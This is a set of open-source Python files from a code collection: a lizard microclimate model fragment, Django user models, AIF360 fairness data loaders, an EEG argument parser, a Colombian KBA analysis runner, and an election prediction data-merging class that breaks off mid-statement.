pd.DataFrame(daylight_means_add.tolist())\n #daylight_for_print.to_csv(\"daylight.csv\")\n \n for jd in range(365):\n for h in range(24):\n \n special_hour_val = special_hours[jd, h]\n daylight_val_add = daylight_means_add[jd, h]\n burrow_day_val_add = burrow_means_add[jd, h]\n burrow_night_val_add = burrow_night_means_add[jd, h]\n open_val_add = open_means_add[jd, h]\n shade_day_val_add = shade_means_add[jd, h]\n shade_night_val_add = shade_night_means_add[jd, h]\n open_tree_val_add = open_tree_means_add[jd, h]\n shaded_tree_val_add = shaded_tree_means_add[jd, h]\n ess_open_tree_val_add = ess_open_tree_means_add[jd, h]\n ess_shaded_tree_val_add = ess_shaded_tree_means_add[jd, h]\n \n if special_hour_val == True:\n \n day_years = daylight_sums_add[jd, h]\n night_years = 20 - day_years\n \n if daylight_val_add == True: # marked as day\n burrow_val_add = (burrow_day_val_add * 20) / day_years\n shade_val_add = (shade_day_val_add * 20) / day_years\n open_val_add = (open_val_add * 20) / day_years\n open_tree_val_add = (open_tree_val_add * 20) / day_years\n shaded_tree_val_add = (shaded_tree_val_add * 20) / day_years\n ess_open_tree_val_add = (ess_open_tree_val_add * 20) / day_years\n ess_shaded_tree_val_add = (ess_shaded_tree_val_add * 20) / day_years\n else:\n burrow_val_add = (burrow_night_val_add * 20) / night_years\n shade_val_add = (shade_night_val_add * 20) / night_years\n open_val_add = 0\n open_tree_val_add = 0\n shaded_tree_val_add = 0\n ess_open_tree_val_add = 0\n ess_shaded_tree_val_add = 0\n else:\n burrow_val_add = burrow_day_val_add + burrow_night_val_add\n shade_val_add = shade_day_val_add + shade_night_val_add\n \n \n row_lst = [jd + 1, h, daylight_val_add, burrow_val_add, open_val_add, shade_val_add, open_tree_val_add, shaded_tree_val_add, ess_open_tree_val_add, ess_shaded_tree_val_add]\n big_lst.append(row_lst)\n\n os.makedirs(\"climbing_info_files\", exist_ok=True)\n out_file_name = \"climbing_info_files/\" + self.climate.inputfilename[:-3] + \".csv\"\n out_file = open(out_file_name, 'w')\n for row in big_lst:\n for column in row:\n out_file.write(str(column) + \",\")\n out_file.write(\"\\n\")\n out_file.close()\n\n \"\"\"\n \n return self.statistics_data\n\n\n","repo_name":"levyofi/Zlotnick_et_al_NCC","sub_path":"Code/lizard_model/Summary/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6503113813","text":"from django.contrib.auth.models import AbstractUser\r\nfrom django.db import models\r\nfrom pytils.translit import slugify\r\n\r\n\r\nclass Group(models.Model):\r\n title = models.CharField(\r\n verbose_name='Название группы',\r\n help_text='Введите название группы',\r\n max_length=200,\r\n )\r\n slug = models.SlugField(\r\n verbose_name='Slug-метка',\r\n help_text='Укажите адрес для страницы группы',\r\n unique=True,\r\n )\r\n\r\n def save(self, *args, **kwargs):\r\n if not self.slug:\r\n self.slug = slugify(self.title)\r\n super().save(*args, **kwargs)\r\n\r\n def __str__(self):\r\n return self.title\r\n\r\n\r\nclass CustomUser(AbstractUser):\r\n email = models.EmailField(\r\n verbose_name='Электронная почта',\r\n help_text='Укажите электронную почту',\r\n null=True,\r\n )\r\n group = models.ForeignKey(\r\n Group,\r\n verbose_name='Группа',\r\n help_text='Выберите группу из списка',\r\n on_delete=models.SET_NULL,\r\n related_name='user',\r\n null=True,\r\n )\r\n allow_manage = models.BooleanField(\r\n default=False,\r\n 
verbose_name='Доступ к управлению',\r\n help_text='Открывает пользователю функционал проверки работ',\r\n null=True,\r\n )\r\n\r\n def __str__(self):\r\n return self.username\r\n","repo_name":"Kneshal/Normocontrol","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"15520808969","text":"from sklearn.linear_model import LogisticRegression\r\nfrom sklearn import svm\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.preprocessing import StandardScaler, MaxAbsScaler\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn import tree\r\nfrom aif360.datasets import AdultDataset, GermanDataset, CompasDataset, BankDataset,MEPSDataset19\r\nfrom aif360.algorithms.preprocessing.optim_preproc_helpers.data_preproc_functions import load_preproc_data_adult, load_preproc_data_compas, load_preproc_data_german\r\nfrom aif360.algorithms.preprocessing.optim_preproc_helpers.distortion_functions\\\r\n import get_distortion_adult, get_distortion_german, get_distortion_compas\r\n# protected in {sex,race,age}\r\ndef get_data(dataset_used, protected,preprocessed = False):\r\n \"\"\" Obtains dataset from AIF360.\r\n\r\n Parameters:\r\n dataset_used (str) -- Name of the dataset\r\n protected (str) -- Protected attribute used\r\n Returns:\r\n dataset_orig (dataset) -- Classifier with default configuration from scipy\r\n privileged_groups (list) -- Attribute and corresponding value of privileged group \r\n unprivileged_groups (list) -- Attribute and corresponding value of unprivileged group \r\n optim_options (dict) -- Options if provided by AIF360\r\n \"\"\"\r\n if dataset_used == \"adult\":\r\n mutation_strategy = {\"0\":[1,0]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_adult(['sex'])\r\n else:\r\n privileged_groups = [{'race': 1}]\r\n unprivileged_groups = [{'race': 0}]\r\n dataset_orig = load_preproc_data_adult(['race'])\r\n \r\n optim_options = {\r\n \"distortion_fun\": get_distortion_adult,\r\n \"epsilon\": 0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n if not preprocessed:\r\n dataset_orig = AdultDataset()\r\n elif dataset_used == \"german\":\r\n mutation_strategy = {\"1\": [0, 1]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_german(['sex'])\r\n optim_options = {\r\n \"distortion_fun\": get_distortion_german,\r\n \"epsilon\": 0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n \r\n else:\r\n privileged_groups = [{'age': 1}]\r\n unprivileged_groups = [{'age': 0}]\r\n dataset_orig = load_preproc_data_german(['age'])\r\n optim_options = {\r\n \"distortion_fun\": get_distortion_german,\r\n \"epsilon\": 0.1,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n } \r\n if not preprocessed:\r\n dataset_orig = GermanDataset()\r\n elif dataset_used == \"compas\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n if protected == \"sex\":\r\n privileged_groups = [{'sex': 1}]\r\n unprivileged_groups = [{'sex': 0}]\r\n dataset_orig = load_preproc_data_compas(['sex'])\r\n else:\r\n privileged_groups = [{'race': 1}]\r\n unprivileged_groups = [{'race': 0}]\r\n dataset_orig = load_preproc_data_compas(['race'])\r\n \r\n optim_options = {\r\n \"distortion_fun\": get_distortion_compas,\r\n \"epsilon\": 
0.05,\r\n \"clist\": [0.99, 1.99, 2.99],\r\n \"dlist\": [.1, 0.05, 0]\r\n }\r\n if not preprocessed:\r\n dataset_orig = CompasDataset()\r\n elif dataset_used == \"bank\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n privileged_groups = [{'age': 1}] \r\n unprivileged_groups = [{'age': 0}]\r\n dataset_orig = BankDataset()\r\n #dataset_orig.features[:,0] = dataset_orig.features[:,0]>=25\r\n optim_options = None\r\n elif dataset_used == \"mep\":\r\n mutation_strategy = {\"0\": [1, 0]}\r\n privileged_groups = [{'RACE': 1}]\r\n unprivileged_groups = [{'RACE': 0}]\r\n dataset_orig = MEPSDataset19()\r\n optim_options = None\r\n return dataset_orig, privileged_groups,unprivileged_groups,optim_options,mutation_strategy\r\n\r\ndef write_to_file(fname,content):\r\n \"\"\" Write content into a line of a file.\r\n\r\n Parameters:\r\n fname (str) -- Name of file to write to \r\n content (str) -- Line that is appendend to file\r\n \"\"\"\r\n f = open(fname, \"a\")\r\n f.write(content)\r\n f.write(\"\\n\")\r\n f.close()\r\n\r\n\r\n","repo_name":"chenzhenpeng18/FSE22-MAAT","sub_path":"Fairea/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4679,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"73853763343","text":"import argparse\n\ndef checkParser():\n parser = argparse.ArgumentParser(description=\"Configure the network\")\n parser.add_argument(\"--model\", \"-m\", dest=\"model_type\", type=str, default=\"RNN\", help=\"type of model (RNN, LSTM, GRU)\")\n parser.add_argument(\"--prep\", \"-p\", dest=\"use_prep\", action=\"store_true\", default=False, help=\"use data preperation or not\")\n parser.add_argument(\"--epochs\", \"-e\", dest=\"num_epochs\", type=int, default=50, help=\"number of the epochs\")\n parser.add_argument(\"--dropout\", \"-d\", dest=\"dropout\", type=float, default=0.6, help=\"dropout value\")\n parser.add_argument(\"--subject\", \"-s\", dest=\"use_subject\", action=\"store_true\", default=False, help=\"use single person data\")\n parser.add_argument(\"--window\", \"-w\", dest=\"window\", type=int, default=None, help=\"window size\")\n \n return parser.parse_args()\n\n\nif __name__==\"__main__\":\n args = checkParser()\n print(args.model_type)\n print(args.use_prep)\n","repo_name":"kyswn/Deep-Learning-on-EEG","sub_path":"final project code/RNN and CNN-RNN code/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"14858783823","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Candidate KBA delimitation of Colombian flora\n# \n# ## Locality aggregation experiments\n# \n# These experiments perform several Ackbar analyses using different thresholds to join close occurrences into a single population.\n\n# In[1]:\n\n\nimport subprocess\nfrom shutil import rmtree\nfrom os import walk, mkdir\n\n\n# In[3]:\n\n\nanalysis_folder = \"/home/nelson/Data/kba/colombia/analyses/localities_aggregation/\"\nackbar_bin = \"/home/nelson/Data/kba/ackbar/ackbar.py\"\n\n\n# ### Analysis execution\n\n# In[4]:\n\n\nrmtree(analysis_folder)\nmkdir(analysis_folder)\n\n\n# In[12]:\n\n\nconfig_text = \"\"\"\ndistribution_file = /home/nelson/Data/kba/colombia/amenazadas_ocurrencias.csv\niucn_file = /home/nelson/Data/kba/colombia/amenazadas_categorias.csv\n\ntaxonomic_groups_file = \ntaxonomic_assignments_file = /home/nelson/Data/kba/colombia/amenazadas_grupos.csv\n\nkba_species_file = 
/home/nelson/Data/kba/colombia/Colombia_IBA_trigger_species.csv\nkba_directory = /home/nelson/Dropbox/Humboldt/Postdoc/KBA_by_IUCN/Colombia_KBA\nkba_index = SitRecID\n\noutfile_root = {0}\noverwrite_output = True\n\ncell_size = {1}\noffset_lat = 0\noffset_lon = 0\n\n#focal_area_directory = \n\npop_max_distance = {2}\n\neps = 0.2\niters = 10000\nmax_kba = 50\ncongruency_factor = 12\"\"\"\n\n\n# In[50]:\n\n\ncesis = [\"0.2\", \"0.5\"]\nlocdists = range(0, 12, 2)\n\n\n# In[13]:\n\n\nfor c in cesis:\n for p in locdists:\n root = \"{0}cell_size_{1}_loc_dist_{2:02.0f}\".format(analysis_folder, c, p)\n #print(root)\n tct = config_text.format(root, c, p)\n config_file = \"{0}cell_size_{1}_loc_dist_{2:02.0f}.txt\".format(analysis_folder, c, p)\n with open(config_file, \"w\") as fh:\n fh.write(tct)\n\n ackbargs = [ackbar_bin, config_file]\n out, err = None, None\n with subprocess.Popen(ackbargs, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as pr:\n out, err = pr.communicate()\n\n if len(err):\n print(err.decode('utf8'))\n\n","repo_name":"nrsalinas/kba_colombia","sub_path":"locality_aggregation.py","file_name":"locality_aggregation.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3093116891","text":"from calculations import Calculations\n\nimport sys\nimport os\nimport pandas as pd\nimport numpy as np\nfrom numpy import array\nfrom numpy import mean\nfrom numpy import std\nfrom numpy.core.umath_tests import inner1d\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import metrics\nimport csv\nimport _pickle\n\nclass Prediction(Calculations):\n \n def __init__(self):\n # get Calculations attributes\n prediction_data_object = Calculations()\n prediction_data_object.get_prediction_data()\n # historical voting data\n self.dem_rep_state_df = prediction_data_object.dem_rep_votes_df\n # education data\n self.overall_education_df = prediction_data_object.overall_education_df\n self.rural_education_df = prediction_data_object.rural_education_df\n self.urban_education_df = prediction_data_object.urban_education_df\n # income data\n self.income_df = prediction_data_object.income_df\n # electoral votes data\n self.electoral_votes_per_state_per_year_dict = prediction_data_object.electoral_votes_dict\n # acronym data\n self.state_acronym_df = prediction_data_object.state_acronym_df\n # probable outcome 538 data\n self.probable_outcomes_538_dict = prediction_data_object.probable_outcomes_538_dict\n # demographic data\n self.demographic_df_1976 = prediction_data_object.demographic_df_1976\n self.demographic_df_1980 = prediction_data_object.demographic_df_1980\n self.demographic_df_1984 = prediction_data_object.demographic_df_1984\n self.demographic_df_1988 = prediction_data_object.demographic_df_1988\n self.demographic_df_1992 = prediction_data_object.demographic_df_1992\n self.demographic_df_1996 = prediction_data_object.demographic_df_1996\n self.demographic_df_2000 = 
prediction_data_object.demographic_df_2000\n self.demographic_df_2004 = prediction_data_object.demographic_df_2004\n self.demographic_df_2008 = prediction_data_object.demographic_df_2008\n self.demographic_df_2012 = prediction_data_object.demographic_df_2012\n self.demographic_df_2016 = prediction_data_object.demographic_df_2016\n self.demographic_df_2018 = prediction_data_object.demographic_df_2018\n self.senate_votes_df = prediction_data_object.senate_votes_df\n self.house_votes_df = prediction_data_object.house_votes_df\n # uncomment if trying to run models - these datasets are large and take longer to load\n '''\n # prediction df data\n self.all_prediction_df = prediction_data_object.all_prediction_df\n self.final_prediction_df = prediction_data_object.final_prediction_df\n '''\n # prediction results data\n self.prediction_results_df = prediction_data_object.prediction_results_df\n self.pop_data_2020_df = prediction_data_object.pop_data_2020_df\n\n def merge_prediction_data(self):\n dem_rep_df = self.dem_rep_state_df\n votes_df_1976 = dem_rep_df.loc[dem_rep_df['Year'] == 1976]\n votes_df_1980 = dem_rep_df.loc[dem_rep_df['Year'] == 1980]\n votes_df_1984 = dem_rep_df.loc[dem_rep_df['Year'] == 1984]\n votes_df_1988 = dem_rep_df.loc[dem_rep_df['Year'] == 1988]\n votes_df_1992 = dem_rep_df.loc[dem_rep_df['Year'] == 1992]\n votes_df_1996 = dem_rep_df.loc[dem_rep_df['Year'] == 1996]\n votes_df_2000 = dem_rep_df.loc[dem_rep_df['Year'] == 2000]\n votes_df_2004 = dem_rep_df.loc[dem_rep_df['Year'] == 2004]\n votes_df_2008 = dem_rep_df.loc[dem_rep_df['Year'] == 2008]\n votes_df_2012 = dem_rep_df.loc[dem_rep_df['Year'] == 2012]\n votes_df_2016 = dem_rep_df.loc[dem_rep_df['Year'] == 2016]\n\n # create 1976 df\n df_1976 = self.overall_education_df[['Code', 'Overall_Edu_1976']]\n df_1976 = df_1976.merge(self.rural_education_df[['Code', 'Rural_Edu_1976']], on='Code')\n df_1976 = df_1976.merge(self.urban_education_df[['Code', 'Urban_Edu_1976']], on='Code')\n df_1976 = df_1976.merge(self.income_df[['Code', '1976_Median_Income']], on='Code')\n df_1976 = df_1976.merge(self.demographic_df_1976[['Code', 'Age_Group_1976', 'Both_Sexes_1976']], on='Code')\n df_1976['Year'] = 1976\n df_1976 = pd.merge(df_1976, self.senate_votes_df, on=['Code', 'Year'])\n df_1976 = pd.merge(df_1976, self.house_votes_df, on=['Code', 'Year'])\n df_1976 = df_1976.merge(votes_df_1976[['Code', 'Winner']], on='Code')\n df_1976.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Year', 'Sen_Party', 'Sen_Candidate_Votes',\n 'Sen_Total_Votes', 'House_Party', 'House_Candidate_Votes',\n 'House_Total_Votes', 'Winner']\n df_1976.to_csv('output.csv', index=False)\n # create 1980 df\n df_1980 = self.overall_education_df[['Code', 'Overall_Edu_1980']]\n df_1980 = df_1980.merge(self.rural_education_df[['Code', 'Rural_Edu_1980']], on='Code')\n df_1980 = df_1980.merge(self.urban_education_df[['Code', 'Urban_Edu_1980']], on='Code')\n df_1980 = df_1980.merge(self.income_df[['Code', '1980_Median_Income']], on='Code')\n df_1980 = df_1980.merge(self.demographic_df_1980[['Code', 'Age_Group_1980', \n 'Both_Sexes_1980', 'Male_1980', 'Female_1980']], on='Code')\n df_1980['Year'] = 1980\n df_1980 = pd.merge(df_1980, self.senate_votes_df, on=['Code', 'Year'])\n df_1980 = pd.merge(df_1980, self.house_votes_df, on=['Code', 'Year'])\n df_1980 = df_1980.merge(votes_df_1980[['Code', 'Winner']], on='Code')\n df_1980.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 
'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1984 df\n df_1984 = self.overall_education_df[['Code', 'Overall_Edu_1984']]\n df_1984 = df_1984.merge(self.rural_education_df[['Code', 'Rural_Edu_1984']], on='Code')\n df_1984 = df_1984.merge(self.urban_education_df[['Code', 'Urban_Edu_1984']], on='Code')\n df_1984 = df_1984.merge(self.income_df[['Code', '1984_Median_Income']], on='Code')\n df_1984 = df_1984.merge(self.demographic_df_1984[['Code', 'Age_Group_1984', \n 'Both_Sexes_1984', 'Male_1984', 'Female_1984']], on='Code')\n df_1984['Year'] = 1984\n df_1984 = pd.merge(df_1984, self.senate_votes_df, on=['Code', 'Year'])\n df_1984 = pd.merge(df_1984, self.house_votes_df, on=['Code', 'Year'])\n df_1984 = df_1984.merge(votes_df_1984[['Code', 'Winner']], on='Code')\n df_1984.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1988 df\n df_1988 = self.overall_education_df[['Code', 'Overall_Edu_1988']]\n df_1988 = df_1988.merge(self.rural_education_df[['Code', 'Rural_Edu_1988']], on='Code')\n df_1988 = df_1988.merge(self.urban_education_df[['Code', 'Urban_Edu_1988']], on='Code')\n df_1988 = df_1988.merge(self.income_df[['Code', '1988_Median_Income']], on='Code')\n df_1988 = df_1988.merge(self.demographic_df_1988[['Code', 'Age_Group_1988', \n 'Both_Sexes_1988', 'Male_1988', 'Female_1988']], on='Code')\n df_1988['Year'] = 1988\n df_1988 = pd.merge(df_1988, self.senate_votes_df, on=['Code', 'Year'])\n df_1988 = pd.merge(df_1988, self.house_votes_df, on=['Code', 'Year'])\n df_1988 = df_1988.merge(votes_df_1988[['Code', 'Winner']], on='Code')\n df_1988.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income', \n 'Age_Group', 'Population', 'Male_Population', 'Female_Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1992 df\n df_1992 = self.overall_education_df[['Code', 'Overall_Edu_1992']]\n df_1992 = df_1992.merge(self.rural_education_df[['Code', 'Rural_Edu_1992']], on='Code')\n df_1992 = df_1992.merge(self.urban_education_df[['Code', 'Urban_Edu_1992']], on='Code')\n df_1992 = df_1992.merge(self.income_df[['Code', '1992_Median_Income']], on='Code')\n df_1992 = df_1992.merge(self.demographic_df_1992[['Code', 'Age_Group_1992', \n 'Race_Sex_1992', 'Ethnic_Origin_1992', 'Population_1992']], on='Code')\n df_1992['Year'] = 1992\n df_1992 = pd.merge(df_1992, self.senate_votes_df, on=['Code', 'Year'])\n df_1992 = pd.merge(df_1992, self.house_votes_df, on=['Code', 'Year'])\n df_1992 = df_1992.merge(votes_df_1992[['Code', 'Winner']], on='Code')\n df_1992.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Race_Sex', 'Ethnic_Origin', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 1996 df\n df_1996 = self.overall_education_df[['Code', 'Overall_Edu_1996']]\n df_1996 = df_1996.merge(self.rural_education_df[['Code', 'Rural_Edu_1996']], on='Code')\n df_1996 = df_1996.merge(self.urban_education_df[['Code', 'Urban_Edu_1996']], on='Code')\n 
df_1996 = df_1996.merge(self.income_df[['Code', '1996_Median_Income']], on='Code')\n df_1996 = df_1996.merge(self.demographic_df_1996[['Code', 'Age_Group_1996',\n 'Race_Sex_1996', 'Ethnic_Origin_1996', 'Population_1996']], on='Code')\n df_1996['Year'] = 1996\n df_1996 = pd.merge(df_1996, self.senate_votes_df, on=['Code', 'Year'])\n df_1996 = pd.merge(df_1996, self.house_votes_df, on=['Code', 'Year'])\n df_1996 = df_1996.merge(votes_df_1996[['Code', 'Winner']], on='Code')\n df_1996.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Race_Sex', 'Ethnic_Origin', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2000 df\n df_2000 = self.overall_education_df[['Code', 'Overall_Edu_2000']]\n df_2000 = df_2000.merge(self.rural_education_df[['Code', 'Rural_Edu_2000']], on='Code')\n df_2000 = df_2000.merge(self.urban_education_df[['Code', 'Urban_Edu_2000']], on='Code')\n df_2000 = df_2000.merge(self.income_df[['Code', '2000_Median_Income']], on='Code')\n df_2000 = df_2000.merge(self.demographic_df_2000[['Code', 'Age_Group_2000', \n 'SEX_2000', 'POPESTIMATE2000']], on='Code')\n df_2000['Year'] = 2000\n df_2000 = pd.merge(df_2000, self.senate_votes_df, on=['Code', 'Year'])\n df_2000 = pd.merge(df_2000, self.house_votes_df, on=['Code', 'Year'])\n df_2000 = df_2000.merge(votes_df_2000[['Code', 'Winner']], on='Code')\n df_2000.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party', \n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2004 df\n df_2004 = self.overall_education_df[['Code', 'Overall_Edu_2004']]\n df_2004 = df_2004.merge(self.rural_education_df[['Code', 'Rural_Edu_2004']], on='Code')\n df_2004 = df_2004.merge(self.urban_education_df[['Code', 'Urban_Edu_2004']], on='Code')\n df_2004 = df_2004.merge(self.income_df[['Code', '2004_Median_Income']], on='Code')\n df_2004 = df_2004.merge(self.demographic_df_2004[['Code', 'Age_Group_2004', \n 'SEX_2004', 'POPESTIMATE2004']], on='Code')\n df_2004['Year'] = 2004\n df_2004 = pd.merge(df_2004, self.senate_votes_df, on=['Code', 'Year'])\n df_2004 = pd.merge(df_2004, self.house_votes_df, on=['Code', 'Year'])\n df_2004 = df_2004.merge(votes_df_2004[['Code', 'Winner']], on='Code')\n df_2004.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party',\n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2008 df\n df_2008 = self.overall_education_df[['Code', 'Overall_Edu_2008']]\n df_2008 = df_2008.merge(self.rural_education_df[['Code', 'Rural_Edu_2008']], on='Code')\n df_2008 = df_2008.merge(self.urban_education_df[['Code', 'Urban_Edu_2008']], on='Code')\n df_2008 = df_2008.merge(self.income_df[['Code', '2008_Median_Income']], on='Code')\n df_2008 = df_2008.merge(self.demographic_df_2008[['Code', 'Age_Group_2008', \n 'SEX_2008', 'POPESTIMATE2008']], on='Code')\n df_2008['Year'] = 2008\n df_2008 = pd.merge(df_2008, self.senate_votes_df, on=['Code', 'Year'])\n df_2008 = pd.merge(df_2008, self.house_votes_df, on=['Code', 'Year'])\n df_2008 = df_2008.merge(votes_df_2008[['Code', 'Winner']], on='Code')\n df_2008.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 
'Population', 'Year', 'Sen_Party',\n 'Sen_Candidate_Votes', 'Sen_Total_Votes', 'House_Party',\n 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2012 df\n df_2012 = self.overall_education_df[['Code', 'Overall_Edu_2012']]\n df_2012 = df_2012.merge(self.rural_education_df[['Code', 'Rural_Edu_2012']], on='Code')\n df_2012 = df_2012.merge(self.urban_education_df[['Code', 'Urban_Edu_2012']], on='Code')\n df_2012 = df_2012.merge(self.income_df[['Code', '2012_Median_Income']], on='Code')\n df_2012 = df_2012.merge(self.demographic_df_2012[['Code', 'Age_Group_2012', \n 'SEX_2012', 'ORIGIN_2012', 'RACE_2012', 'POPESTIMATE2012']], on='Code')\n df_2012['Year'] = 2012\n df_2012 = pd.merge(df_2012, self.senate_votes_df, on=['Code', 'Year'])\n df_2012 = pd.merge(df_2012, self.house_votes_df, on=['Code', 'Year'])\n df_2012 = df_2012.merge(votes_df_2012[['Code', 'Winner']], on='Code')\n df_2012.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2016 df\n df_2016 = self.overall_education_df[['Code', 'Overall_Edu_2016']]\n df_2016 = df_2016.merge(self.rural_education_df[['Code', 'Rural_Edu_2016']], on='Code')\n df_2016 = df_2016.merge(self.urban_education_df[['Code', 'Urban_Edu_2016']], on='Code')\n df_2016 = df_2016.merge(self.income_df[['Code', '2016_Median_Income']], on='Code')\n df_2016 = df_2016.merge(self.demographic_df_2016[['Code', 'Age_Group_2016', \n 'SEX_2016', 'ORIGIN_2016', 'RACE_2016', 'POPESTIMATE2016']], on='Code')\n df_2016['Year'] = 2016\n df_2016 = pd.merge(df_2016, self.senate_votes_df, on=['Code', 'Year'])\n df_2016 = pd.merge(df_2016, self.house_votes_df, on=['Code', 'Year'])\n df_2016 = df_2016.merge(votes_df_2016[['Code', 'Winner']], on='Code')\n df_2016.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes', 'Winner']\n # create 2018 df\n df_2018 = self.overall_education_df[['Code', 'Overall_Edu_2018']]\n df_2018 = df_2018.merge(self.rural_education_df[['Code', 'Rural_Edu_2018']], on='Code')\n df_2018 = df_2018.merge(self.urban_education_df[['Code', 'Urban_Edu_2018']], on='Code')\n df_2018 = df_2018.merge(self.income_df[['Code', '2018_Median_Income']], on='Code')\n df_2018 = df_2018.merge(self.demographic_df_2018[['Code', 'Age_Group_2018', \n 'SEX_2018', 'ORIGIN_2018', 'RACE_2018', 'POPESTIMATE2018']], on='Code')\n df_2018['Year'] = 2018\n df_2018 = pd.merge(df_2018, self.senate_votes_df, on=['Code', 'Year'])\n df_2018 = pd.merge(df_2018, self.house_votes_df, on=['Code', 'Year'])\n df_2018.columns = ['Code', 'Overall_Edu', 'Rural_Edu', 'Urban_Edu', 'Median_Income',\n 'Age_Group', 'Sex', 'Ethnic_Origin', 'Race', 'Population',\n 'Year', 'Sen_Party', 'Sen_Candidate_Votes', 'Sen_Total_Votes',\n 'House_Party', 'House_Candidate_Votes', 'House_Total_Votes']\n \n print('finished all df 
individually, now merging...')\n # concatenate all prediction data\n final_df = pd.concat([df_1976, df_1980, df_1984, df_1988, df_1992, df_1996, df_2000,\n df_2004, df_2008, df_2012, df_2016, df_2018], axis=0, ignore_index=True)\n final_df.to_csv('all_prediction_data.csv', index=False)\n\n def impute_missing_data(self):\n # create prediction df\n prediction_df = self.all_prediction_df\n prediction_df = prediction_df[prediction_df.Sex != 0]\n prediction_df = prediction_df[prediction_df.Ethnic_Origin != 0]\n\n # average male/female breakdown to extrapolate data fields\n average_male_percent = .492\n average_female_percent = 1 - average_male_percent\n\n # fill NaN values with U and assign national averages to each row\n new_df = prediction_df.assign(Male_Population=prediction_df['Male_Population'].fillna('U'))\n new_df = new_df.assign(Female_Population=new_df['Female_Population'].fillna('U'))\n\n new_df = new_df.assign(\n Male_Population=new_df.apply(\n 